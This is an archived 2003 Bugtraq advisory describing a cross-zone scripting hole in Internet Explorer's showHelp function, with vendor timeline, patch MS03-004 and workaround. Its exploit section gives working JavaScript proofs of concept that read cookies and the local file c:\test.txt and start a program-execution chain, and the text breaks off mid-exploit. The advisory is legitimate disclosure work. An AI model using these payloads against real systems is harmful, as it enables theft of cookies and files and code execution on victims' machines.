From sandblad@acc.umu.se Sat Feb 8 04:02:26 2003 From: Andreas Sandblad To: bugtraq@securityfocus.com Date: Thu, 6 Feb 2003 13:02:56 +0100 (CET) Subject: showHelp("file:") disables security in IE - Sandblad advisory #11 - Sandblad advisory #11 - /--------------------------------------------------------------/ Title: showHelp("file:") disables security in IE Date: [06-02-2003] Software: Internet Explorer 6.0, 5.x Vendor: http://www.microsoft.com/ Patch: The author has been working with the vendor to fix the vulnerability. A patch (MS03-004) can be downloaded from http://windowsupdate.microsoft.com/ Workaround: Disable Active scripting and ActiveX Type: Cross site/zone scripting Impact: Reading arbitrary cookies/local files and execute programs with parameters _ _ o' \,=./ `o Author: Andreas Sandblad, sandblad@acc.umu.se (o o) /--=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo--/ TABLE OF CONTENTS: ================== Summary ...................................................... 1 Vendor status ................................................ 2 Details ...................................................... 3 Exploit ...................................................... 4 FAQ .......................................................... 5 Disclaimer ................................................... 6 Feedback ..................................................... 7 (1) SUMMARY: ============ The author has found a cross site/zone vulnerability in the showHelp function. An attacker can use this vulnerability to read arbitrary cookies/local files and execute programs with parameters leading to total system compromise if IE is run as administrator. Users can protect themselves by downloading the latest patch from Microsoft at: http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/ms03-004.asp A valid workaround is to disable Active scripting and ActiveX. (2) VENDOR STATUS: ================== 30-10-2002: Microsoft informed about the vulnerability. 05-02-2003: Microsoft released MS03-004 patching the vulnerability. (3) DETAILS: ============ The function showHelp is designed to show help files, as described at: http://msdn.microsoft.com/library/default.asp?url=/workshop/author/dhtml/reference/methods/showhelp.asp Basically, there are several security restrictions on the url argument: 1. Only urls starting with "file:" or "http:" are allowed. 2. If the url points to a local resource, then it must be a compiled help file with file extension .chm. 3. Compiled help files downloaded using the http protocol are not trusted. The problem is that if you call showHelp with the argument "file:" then security restriction (1) gets disabled. This is quite strange behaviour, specially since you have to restart IE to activate it again. (Since IE is not open source, further analysis is hard to perform) So, what can be achieved with (1) disabled? One way is to take advantage of the javascript protocol. Remember that javascript code in an url with the javascript protocol will be operating in the same site/zone as the url it is applied over. Examine the following javascript code: showHelp("file:") // Disable security restriction showHelp(url); // Let url be in another site/zone showHelp("javascript:"+code); // Operating in same site/zone as url Clearly we have a cross site/zone scripting issue. For example we can access/control the Local computer zone using something like: showHelp("file:"); showHelp("res://shdoclc.dll/about.dlg"); // Local computer zone showHelp("javascript:alert('Hey, I am in the Local computer zone')"); (4) EXPLOIT: ============ The following exploits written in javascript will demonstrate how to use the cross site/zone vulnerability to: 1. Read arbitrary cookies 2. Read any local file using the XMLHTTP ActiveX control 3. Read viewable local files the old way 4. Using the "execute programs with parameters" method Simply put the javascript code inside a script tag of an empty html document and upload it to a remote server. The exploits have only been tested on a limited set of setups and may have to be altered in order to work. Make sure you have what is required (local file exist etc...). Exploit 1: // Sandblad advisory #11 - Read your google cookie showHelp("file:");showHelp("http://www.google.com/"); showHelp("javascript:alert(document.cookie)"); Exploit 2: // Sandblad advisory #11 - Read the file c:\test.txt showHelp("file:");showHelp("res://shdoclc.dll/about.dlg"); showHelp("javascript:try{c=new ActiveXObject('Msxml2.XMLHTTP')}\ catch(e){c=new ActiveXObject('Microsoft.XMLHTTP')};c.open('GET',\ 'file://c:/test.txt',false);c.send(null);alert(c.responseText)"); Exploit 3: // Sandblad advisory #11 - Read the file c:\test.txt showHelp("file:");showHelp("file://c:/test.txt"); showHelp("javascript:alert(document.body.innerText)"); Exploit 4: // Sandblad advisory #11 - Run the very nice game Winmine showHelp("file:");showHelp("iexplore.chm");showHelp("res:"); showHelp("javascript:location='mk:@MSITStore:C:'"); showHelp("javascript:document.write('